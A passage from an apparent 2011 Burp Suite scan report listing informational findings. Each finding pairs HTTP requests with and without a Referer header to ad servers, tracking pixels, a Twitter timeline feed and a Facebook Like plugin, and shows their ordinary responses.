Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Wed, 27-Apr-2011 13:46:01 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Tue, 26 Apr 2011 13:46:01 GMT
Content-Length: 552

document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=541&size=728x90&inv_code=1712152&referrer=http://www.nuclearpesticide.com/%3Fepl=GWxgAxA73QxrLsd2C6qmPnS3ZN9CQuEUyV38MxNtdDzbPO8DkWEHRIZAwJEDpKPH-fRZWF7ASJjVMurhyobiRLm-kN1iK6-u1SwKVBQvmQiJThLEwAFhK8C7kmCnqgZgRKGT6s5H2tSm7aABlEc9EG3U5CmC9DSATFOjTU2bhiJ0ACAQ3ue_AADgfwUAAECAWwkAAN0t2bdZUyZZQTE2aFpChgAAAPA&redir=http%3A%2F%2Fad.yieldmanager.com%2Fst%3Fanmember%3D541%26anprice%3D%7BPRICEBUCKET%7D%26ad_type%3Dad%26ad_size%3D728x90%26section%3D1712152"></scr'+'ipt>');

Request 2

GET /st?ad_type=ad&ad_size=728x90&section=1712152 HTTP/1.1
Host: adserving.cpxinteractive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Wed, 27-Apr-2011 13:46:16 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Tue, 26 Apr 2011 13:46:16 GMT
Content-Length: 280

document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=541&size=728x90&inv_code=1712152&redir=http%3A%2F%2Fad.yieldmanager.com%2Fst%3Fanmember%3D541%26anprice%3D%7BPRICEBUCKET%7D%26ad_type%3Dad%26ad_size%3D728x90%26section%3D1712152"></scr'+'ipt>');

18.2. http://response.firstdata.com/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://response.firstdata.com
Path:   /

Request 1

GET /?elqPURLPage=15&69ddc HTTP/1.1
Host: response.firstdata.com
Proxy-Connection: keep-alive
Referer: http://burp/show/8
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=269008486.1303775197.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=269008486.510355525.1303775197.1303775197.1303775197.1

Response 1

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA",
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 00:55:58 GMT
Content-Length: 25969

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" "http://www.w3.org/TR/html4/frameset.dtd">
<HTML>
<HEAD>
<META http-equiv="Content-Type" content="text/html; charset=UTF-8">
<TITLE>The F
...[SNIP]...
<img src="http://now.eloqua.com/visitor/v200/svrGP.aspx?pps=60&siteid=1843&PURLSiteID=1&PURLSiteAlternateDNSID=0&PURLPageID=15&PURLRecordID=0&PURLGUID=ae83e094-2bef-417f-92ad-cca4c8af7dc1&elq={00000000-0000-0000-0000-000000000000}&ref=http%3a%2f%2fburp%2fshow%2f8&elq_ck=0&elqPURLPage=15&69ddc=" border=0 width=1 height=1 ><\/layer>');
}else{
document.write('<img style="display:none" src="http://now.eloqua.com/visitor/v200/svrGP.aspx?pps=60&siteid=1843&PURLSiteID=1&PURLSiteAlternateDNSID=0&PURLPageID=15&PURLRecordID=0&PURLGUID=ae83e094-2bef-417f-92ad-cca4c8af7dc1&elq={00000000-0000-0000-0000-000000000000}&ref=http%3a%2f%2fburp%2fshow%2f8&elq_ck=0&elqPURLPage=15&69ddc=" border=0 width=1 height=1 >');
}
-->
</script>
</BODY></HTML>

Request 2

GET /?elqPURLPage=15&69ddc HTTP/1.1
Host: response.firstdata.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=269008486.1303775197.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=269008486.510355525.1303775197.1303775197.1303775197.1

Response 2

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA",
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 00:56:14 GMT
Content-Length: 25903

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" "http://www.w3.org/TR/html4/frameset.dtd">
<HTML>
<HEAD>
<META http-equiv="Content-Type" content="text/html; charset=UTF-8">
<TITLE>The F
...[SNIP]...
<img src="http://now.eloqua.com/visitor/v200/svrGP.aspx?pps=60&siteid=1843&PURLSiteID=1&PURLSiteAlternateDNSID=0&PURLPageID=15&PURLRecordID=0&PURLGUID=2033fe65-a773-4156-9380-0ab52e7dfe89&elq={00000000-0000-0000-0000-000000000000}&elq_ck=0&elqPURLPage=15&69ddc=" border=0 width=1 height=1 ><\/layer>');
}else{
document.write('<img style="display:none" src="http://now.eloqua.com/visitor/v200/svrGP.aspx?pps=60&siteid=1843&PURLSiteID=1&PURLSiteAlternateDNSID=0&PURLPageID=15&PURLRecordID=0&PURLGUID=2033fe65-a773-4156-9380-0ab52e7dfe89&elq={00000000-0000-0000-0000-000000000000}&elq_ck=0&elqPURLPage=15&69ddc=" border=0 width=1 height=1 >');
}
-->
</script>
</BODY></HTML>

18.3. http://shots.snap.com/asj/v1/6e8afd4f63cdc7886a3f718aa78c7375/2863866373/auto_shot.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://shots.snap.com
Path:   /asj/v1/6e8afd4f63cdc7886a3f718aa78c7375/2863866373/auto_shot.js

Request 1

GET /asj/v1/6e8afd4f63cdc7886a3f718aa78c7375/2863866373/auto_shot.js?sz=44009&lm=04/26/2011%2000%3A20%3A48&size=small&accept=shots HTTP/1.1
Host: shots.snap.com
Proxy-Connection: keep-alive
Referer: http://www.slaviks-blog.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: user=id%3D16266132404ce087181f51bbd2d1a9b9%26exp%3D1366766106%26v%3D2%26origin%3Dshots

Response 1

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 01:21:21 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/1.0.0 PHP/5.2.17
X-Powered-By: PHP/5.2.17
Cache-Control: max-age=7200
Expires: Tue, 26 Apr 2011 03:21:21 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 199

if (typeof SNAP_COM == "undefined") { SNAP_COM = {}; }
SNAP_COM.autoshot = {"Results":{"Matches":null
}}
;
if (SNAP_COM.shot && SNAP_COM.shot.autoshot_init) { SNAP_COM.shot.autoshot_init(true) }

Request 2

GET /asj/v1/6e8afd4f63cdc7886a3f718aa78c7375/2863866373/auto_shot.js?sz=44009&lm=04/26/2011%2000%3A20%3A48&size=small&accept=shots HTTP/1.1
Host: shots.snap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: user=id%3D16266132404ce087181f51bbd2d1a9b9%26exp%3D1366766106%26v%3D2%26origin%3Dshots

Response 2

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 01:21:50 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/1.0.0 PHP/5.2.17
X-Powered-By: PHP/5.2.17
Cache-Control: max-age=7200
Expires: Tue, 26 Apr 2011 03:21:50 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 184

if (typeof SNAP_COM == "undefined") { SNAP_COM = {}; }
SNAP_COM.autoshot = {"Results":{}}
;
if (SNAP_COM.shot && SNAP_COM.shot.autoshot_init) { SNAP_COM.shot.autoshot_init(true) }

18.4. http://twitter.com/statuses/user_timeline/hugthecloud.json  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://twitter.com
Path:   /statuses/user_timeline/hugthecloud.json

Request 1

GET /statuses/user_timeline/hugthecloud.json?callback=twitterCallback2&count=5 HTTP/1.1
Host: twitter.com
Proxy-Connection: keep-alive
Referer: http://www.hugthecloud.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=130340348934320043; __utmz=43838368.1303561994.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); js=1; __utma=43838368.551233229.1303561994.1303561994.1303568398.2

Response 1

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 13:18:30 GMT
Server: hi
Status: 200 OK
X-Transaction: 1303823910-81705-29867
X-RateLimit-Limit: 150
ETag: "dcb2235386a41d7ff9cbe42580900723"-gzip
Last-Modified: Tue, 26 Apr 2011 13:18:30 GMT
X-RateLimit-Remaining: 148
X-Runtime: 0.01135
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef1146c459667
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-RateLimit-Reset: 1303827509
Set-Cookie: k=173.193.214.243.1303823910171269; path=/; expires=Tue, 03-May-11 13:18:30 GMT; domain=.twitter.com
Set-Cookie: original_referer=ZLhHHTiegr9Ip2a6cBCDOAo1h05uSLBlg5g5fY%2BtAkI%3D; path=/
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCCEF9pEvAToHaWQiJWZlZGZmY2YxMWU0M2Ez%250AMzUyYWY5NWVmODFkNmNhYWFiIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--05ae089e95cd1d1ddf9d87e388f559ab51ae5025; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Length: 9213

twitterCallback2([{"in_reply_to_user_id":61437533,"truncated":false,"text":"@sven_kr re: hosting - those R good choices but if u want high availability at the hardware level try vCloud Express by Virtacore","id_str":"60068578858254337","geo":null,"retweet_count":0,"favorited":false,"in_reply_to_screen_name":"sven_kr","source":"\u003Ca href=\"http:\/\/www.hootsuite.com\" rel=\"nofollow\"\u003EHootSuite\u003C\/a\u003E","created_at":"Mon Apr 18 19:53:59 +0000 2011","in_reply_to_status_id_str":"60061052318121984","contributors":null,"retweeted":false,"in_reply_to_user_id_str":"61437533","in_reply_to_status_id":60061052318121984,"user":{"friends_count":1289,"location":"Los Angeles, CA","id_str":"15181560","verified":false,"favourites_count":0,"profile_text_color":"333333","description":"Don't be a server hugger. Hug the Cloud is for discovering the expanding worlds of Cloud Computing and SaaS. Fueled by @IKANO, a Google Apps Partner.","contributors_enabled":false,"notifications":null,"profile_sidebar_fill_color":"DDEEF6","default_profile_image":false,"default_profile":true,"following":null,"profile_background_tile":false,"created_at":"Fri Jun 20 16:33:13 +0000 2008","profile_image_url":"http:\/\/a1.twimg.com\/profile_images\/131169860\/hc_normal.png","time_zone":"Mountain Time (US & Canada)","profile_link_color":"0084B4","follow_request_sent":null,"profile_sidebar_border_co
...[SNIP]...

Request 2

GET /statuses/user_timeline/hugthecloud.json?callback=twitterCallback2&count=5 HTTP/1.1
Host: twitter.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=130340348934320043; __utmz=43838368.1303561994.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); js=1; __utma=43838368.551233229.1303561994.1303561994.1303568398.2

Response 2

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 13:18:36 GMT
Server: hi
Status: 200 OK
X-Transaction: 1303823916-65333-16155
X-RateLimit-Limit: 150
ETag: "dcb2235386a41d7ff9cbe42580900723"-gzip
Last-Modified: Tue, 26 Apr 2011 13:18:36 GMT
X-RateLimit-Remaining: 130
X-Runtime: 0.01706
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef114
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-RateLimit-Reset: 1303827509
Set-Cookie: k=173.193.214.243.1303823916349024; path=/; expires=Tue, 03-May-11 13:18:36 GMT; domain=.twitter.com
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCEQd9pEvAToHaWQiJTUwZDZlNDM4Y2NiN2Jj%250AZWUwNjA3ZWRkMTNlZGY5NjIwIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--b6eab874073805debdd5080a2b8a2861a35c9d0b; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Length: 9213

twitterCallback2([{"in_reply_to_user_id":61437533,"truncated":false,"text":"@sven_kr re: hosting - those R good choices but if u want high availability at the hardware level try vCloud Express by Virtacore","id_str":"60068578858254337","geo":null,"retweet_count":0,"favorited":false,"in_reply_to_screen_name":"sven_kr","source":"\u003Ca href=\"http:\/\/www.hootsuite.com\" rel=\"nofollow\"\u003EHootSuite\u003C\/a\u003E","created_at":"Mon Apr 18 19:53:59 +0000 2011","in_reply_to_status_id_str":"60061052318121984","contributors":null,"retweeted":false,"in_reply_to_user_id_str":"61437533","in_reply_to_status_id":60061052318121984,"user":{"friends_count":1289,"location":"Los Angeles, CA","id_str":"15181560","verified":false,"favourites_count":0,"profile_text_color":"333333","description":"Don't be a server hugger. Hug the Cloud is for discovering the expanding worlds of Cloud Computing and SaaS. Fueled by @IKANO, a Google Apps Partner.","contributors_enabled":false,"notifications":null,"profile_sidebar_fill_color":"DDEEF6","default_profile_image":false,"default_profile":true,"following":null,"profile_background_tile":false,"created_at":"Fri Jun 20 16:33:13 +0000 2008","profile_image_url":"http:\/\/a1.twimg.com\/profile_images\/131169860\/hc_normal.png","time_zone":"Mountain Time (US & Canada)","profile_link_color":"0084B4","follow_request_sent":null,"profile_sidebar_border_color":"C0DEED","followers_count":1163,"screen_name":"hugthecloud","show_all_inline_media
...[SNIP]...

18.5. http://www.bizographics.com/collect/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.bizographics.com
Path:   /collect/

Request 1

GET /collect/?fmt=gif&url=response.firstdata.com&pid=1009 HTTP/1.1
Host: www.bizographics.com
Proxy-Connection: keep-alive
Referer: http://response.firstdata.com/?elqPURLPage=15
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoID=55f5fe79-12b4-4f78-9976-61924d438e85; BizoData=xpA78UaP5mY4YDpjM3cPh9Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KQFMYVM1J6enaj5XcunNcMDa7Re6IGD4lDGXtlaauKpHAd6xyMUDLG6HwNFYBuERpuip6J7BXd0x4sE9pUJC88Pe5yXHOj6bWJ8aODe9cOOkiim9Da6XiirwxBAB0ZFDipA0aleYkLyGipuiicoxOXJii2rplrpQCQEipwV9h67ETqsE1eipWwwnuFtpqEzDeP3Y84mqpw7c8rqipRMEYPOEhN8UMj4XYITcDlTehMXv6yypp6AmSipxPddYpylx7e4dpBDiij57vFe2oBf0ipmt6RRlAydgIWkGDyfisfDPHdMovfSDMpZP3LipyKbm8481vVAn4t3h6RTVissytDGtO0HVbGfbrxfWf6lnG4WL41W3AH0xNl7tETxisC5GEKyPhHoyiihEliiiihEZXwieie; BizoNetworkPartnerIndex=3

Response 1

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache
Content-Language: en-US
Date: Mon, 25 Apr 2011 23:44:11 GMT
Location: http://ad.bizo.com/pixel?id=1258184&t=2
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=55f5fe79-12b4-4f78-9976-61924d438e85; Domain=.bizographics.com; Expires=Tue, 25-Oct-2011 11:44:11 GMT; Path=/
Set-Cookie: BizoData=BiimYs2dCnnkYokR5LALIdNQb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KRwyz8QeClGZaj5XcunNcMDa7Re6IGD4lOgzJypdKRL6Ad6xyMUDLG7Ls3W4E4jF1liisFhqr12LzsIxjybldL0GQrQ8ohAZLAMaODe9cOOkiim9Da6XiirwxBAB0ZFDipA0aleYkLyGipuiicoxOXJii2rplrpQCQEipwV9h67ETqsE1eipWwwnuFtpqEzDeP3Y84mqpw8axzZEGMHjfOEhN8UMj4XaoP57SMbkTjDOsfxe0q98KOVcdy2PXFii1PU6e2biipKbWwErwOA1uvGg1WadM37je21ySjBqI9OZvePk1jYeANuipyKbm8481vVAn4t3h6RTVissytDGtO0HVbGfbrxfWf6lnG4WL41W3AH0xNl7tETxisC5GEKyPhHoyiihEliiiihEZXwieie; Domain=.bizographics.com; Expires=Tue, 25-Oct-2011 11:44:11 GMT; Path=/
Content-Length: 0
Connection: keep-alive

Request 2

GET /collect/?fmt=gif&url=response.firstdata.com&pid=1009 HTTP/1.1
Host: www.bizographics.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoID=55f5fe79-12b4-4f78-9976-61924d438e85; BizoData=xpA78UaP5mY4YDpjM3cPh9Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KQFMYVM1J6enaj5XcunNcMDa7Re6IGD4lDGXtlaauKpHAd6xyMUDLG6HwNFYBuERpuip6J7BXd0x4sE9pUJC88Pe5yXHOj6bWJ8aODe9cOOkiim9Da6XiirwxBAB0ZFDipA0aleYkLyGipuiicoxOXJii2rplrpQCQEipwV9h67ETqsE1eipWwwnuFtpqEzDeP3Y84mqpw7c8rqipRMEYPOEhN8UMj4XYITcDlTehMXv6yypp6AmSipxPddYpylx7e4dpBDiij57vFe2oBf0ipmt6RRlAydgIWkGDyfisfDPHdMovfSDMpZP3LipyKbm8481vVAn4t3h6RTVissytDGtO0HVbGfbrxfWf6lnG4WL41W3AH0xNl7tETxisC5GEKyPhHoyiihEliiiihEZXwieie; BizoNetworkPartnerIndex=3

Response 2

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache
Content-Language: en-US
Date: Mon, 25 Apr 2011 23:44:30 GMT
Location: http://img.bizographics.com/1x1.gif
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=55f5fe79-12b4-4f78-9976-61924d438e85; Domain=.bizographics.com; Expires=Tue, 25-Oct-2011 11:44:30 GMT; Path=/
Set-Cookie: BizoData=BiimYs2dCnnmJKE4Bm9CkItQb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KS7gqJK6jkFYaj5XcunNcMDa7Re6IGD4lNENGwzUcxvvAd6xyMUDLG7Ls3W4E4jF1liisFhqr12LzsIxjybldL0GQrQ8ohAZLAMaODe9cOOkiim9Da6XiirwxBAB0ZFDipA0aleYkLyGipuiicoxOXJii2rplrpQCQEipwV9h67ETqsE1eipWwwnuFtpqEzDeP3Y84mqpw9hw8kabJE0jOEhN8UMj4XaoP57SMbkTjJleYoTiibAY4ESgVdf3ka4HX85a82wnCw2wErwOA1uvGg1WadM37je21ySjBqI9OZvePk1jYeANuipyKbm8481vVAn4t3h6RTVissytDGtO0HVbGfbrxfWf6lnG4WL41W3AH0xNl7tETxisC5GEKyPhHoyiihEliiiihEZXwieie; Domain=.bizographics.com; Expires=Tue, 25-Oct-2011 11:44:30 GMT; Path=/
Content-Length: 0
Connection: keep-alive


18.6. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /plugins/like.php

Request 1

GET /plugins/like.php?&width=400&height=80&layout=standard&show_faces=true&action=like&font=arial&colorscheme=light&href=http%3A%2F%2Fwww.bing.com%3Fssd%3D20110426_0700%26ssh%3DS583531935%26FORM%3DHPFBLK%26mkt%3Den-US%26 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.55.26.63
X-Cnection: close
Date: Tue, 26 Apr 2011 13:54:02 GMT
Content-Length: 8460

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div id="connect_widget_4db6ce7a3d2bc2442634345" class="connect_widget" style="font-family: &quot;arial&quot;, sans-serif"><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_vertical_center"><div class="connect_confirmation_cell connect_confirmation_cell_no_like"><div class="connect_widget_text_summary connect_text_wrapper"><span class="connect_widget_facebook_favicon"></span><span class="connect_widget_user_action connect_widget_text hidden_elem">You like <b>Today&#039;s picture</b>.<span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_share_comment_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_share_comment_option">Add Comment</a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_error_text">Error</a></span></span><span class="connect_widget_summary connect_widget_text"><span class="connect_widget_connected_text hidden_elem">You and 457 others like this.</span><span class="connect_widget_not_connected_text">457 likes. <a href="/campaign/landing.php?campaign_id=137675572948107&amp;partner_id=bing.com&amp;placement=like_button&amp;extra_1=http%3A%2F%2Fwww.bing.com%2F&amp;extra_2=US" target="_blank">Sign Up</a> to see
...[SNIP]...

Request 2

GET /plugins/like.php?&width=400&height=80&layout=standard&show_faces=true&action=like&font=arial&colorscheme=light&href=http%3A%2F%2Fwww.bing.com%3Fssd%3D20110426_0700%26ssh%3DS583531935%26FORM%3DHPFBLK%26mkt%3Den-US%26 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.55.7.61
X-Cnection: close
Date: Tue, 26 Apr 2011 13:54:11 GMT
Content-Length: 8389

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div id="connect_widget_4db6ce83a12605236306928" class="connect_widget" style="font-family: &quot;arial&quot;, sans-serif"><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_vertical_center"><div class="connect_confirmation_cell connect_confirmation_cell_no_like"><div class="connect_widget_text_summary connect_text_wrapper"><span class="connect_widget_facebook_favicon"></span><span class="connect_widget_user_action connect_widget_text hidden_elem">You like <b>Today&#039;s picture</b>.<span class="unlike_span 